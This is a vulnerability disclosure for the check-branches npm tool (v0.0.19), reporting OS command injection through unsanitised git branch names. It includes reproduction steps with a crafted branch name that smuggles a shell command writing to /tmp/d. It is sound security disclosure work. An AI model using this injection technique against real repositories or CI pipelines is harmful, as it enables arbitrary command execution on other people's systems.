check-branches describes itself as a "CLI to automatically check if your current repo branch has any conflicts with all other repo's branches. Really useful when working with big teams."
Resources:
- Project's GitHub source code: https://github.com/puntorigen/check-branches/
- Project's npm package: https://www.npmjs.com/package/check-branches
I'm reporting an OS Command Injection vulnerability in check-branches npm package.
check-branches is a command-line tool that is interacted with locally, or via CI, to confirm no conflicts exist in git branches.
However, the library follows these conventions which can be abused:
- It trusts branche names as they are (plain text)
- It spawns git commands by concatenating user input
Since a branch name is potentially a user input, as users can create branches remotely, via pull requests, or simply due to privileged access to a repository, then they can effectively run any command.
- Install
check-branches@0.0.19which is the latest.
npm install -g check-branches
-
Make sure there's a valid git repository with remotes configured and at least one valid branch created
-
Create a new git branch as follows:
git checkout -b ";{echo,hello,world}>/tmp/d"(these charaters are indeed valid git branch names) -
Run the check-branches program in the git project: directory
check-branches, and observe output similar to:
❯ check-branches
********************************
* check-branches CLI v0.0.19 *
********************************
✔ generating report
Wow! Congratulations! Your current branch has no conflicts with any other liran-test-repo repo branches!
time for 'check': 151ms
- Confirm that the file
/tmp/dwas created with the contents ofhello worldin it.
Liran Tal